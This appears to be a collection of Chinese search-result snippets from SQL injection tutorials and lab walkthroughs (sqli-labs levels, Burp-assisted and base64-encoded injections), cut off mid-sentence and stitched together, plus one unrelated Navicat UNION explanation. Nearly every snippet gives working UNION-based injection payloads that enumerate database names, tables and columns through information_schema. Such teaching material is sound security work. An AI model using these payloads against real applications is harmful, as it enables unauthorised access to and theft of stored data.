union select1,2,database(),version(),user(),6,7 b.得到数据库库名后查当前数据库表名 代码语言:javascript 复制 union select table_name from information_schema.tables where table_schema=database(); c.在查到的表名中查找列名,假设需要的表名为:user 代码语言:javascript 复制 union select column_n...
' union select 1,2# ' union select database(),version()# 爆数据库名,表名,字段名 (可以用burp抓包进行) less-12 12和11的步骤一样。只是username的类型不同。 12的username为("username")也就是使用了双引号和括号包裹。
5.?id=-1' union select 1,2,3--+显示2,3 6.获取数据库名和表名?id=-1 ' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=(select database())),database()--+ 7.h获取字段名?id=-1 ' union select 1,database(),(select group_concat(...
登录后发现uname的值不是admin而是看不懂的字符 这是因为将admin进行base64转码 YWRtaW4= 解码之后为admin 和第20关相似,只不过这一次将admin进行base64转码 使用burp抓包 在admin后面加上’并进行编码 发送后报错,显示还需要一个) 显示当前数据库 编码前:’) union select 1,2,database() # 编码后:JykgdW5p...
返回的结果为2﹕5,意味着在union select 1,2,3,4,5中,可以在2和5的位置输入MySQL语句。尝试在2的位置查询当前数据库库名(使用database()函数),访问id=-1 union select 1,database(),3,4,5,页面成功返回了数据库信息,如图4-20所示。 图4-20 ...
navicat中UNION操作符于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。多个 SELECT 语句会删除重复的数据,就好象两个查询结果捏到一起一样 工具/原料 navicat for mysql 版本10.0.11 数据库:mysql数据库 方法/步骤 1 新建一个数据database_union 2 在数据库中创建两个表table_union1,table_union2...
返回的结果为2 : 3,意味着在union select 1, 2, 3中,2和3的位置可以输入MySQL语句。我们尝试在2的位置查询当前数据库名(使用database ()函数)访问id=1 union select 1,database (),3,页面成功返回了数据库信息,如图所示。 得知了数据库库名后,接下来输入以下命令查询表名。
通常from后面都会有一个表名 比如 admin id user之类的union select 1,2,3,4,5,6,7,8,9,10,11 from 你这里给到11说明字段长度是11 那么再继续这个语句从from后面的哪个表里面查然后返回页面就会返回1~11这几个数字中的其中几个在mysql中 有很多的注射能用到的函数 比如 user() database() version() ...
1' union select 1,2 # 1’ 部分表示与原始SQL的单引号拼接成完整字符 union 部分表示与原始SQL语句拼接 select 1,2 部分是SQL注入攻击者可以控制写的SQL,其中一定要保持只有2列 # 部分注释掉原始SQL的后半部分执行成功后,我们可以在select 1,2部分进行变形,如select user(),database()。即在输入点输入1’...
sss-s347glt.gxalabs.com' union select 1,2,3 --+ 编辑 5.查询使用的是那个数据库 sss-s347glt.gxalabs.com' union select 1,database(),3 --+ 编辑 6.查询表名 sss-s347glt.gxalabs.com' union select 1,database(),group_concat(table_name) from information_schema.tables where ...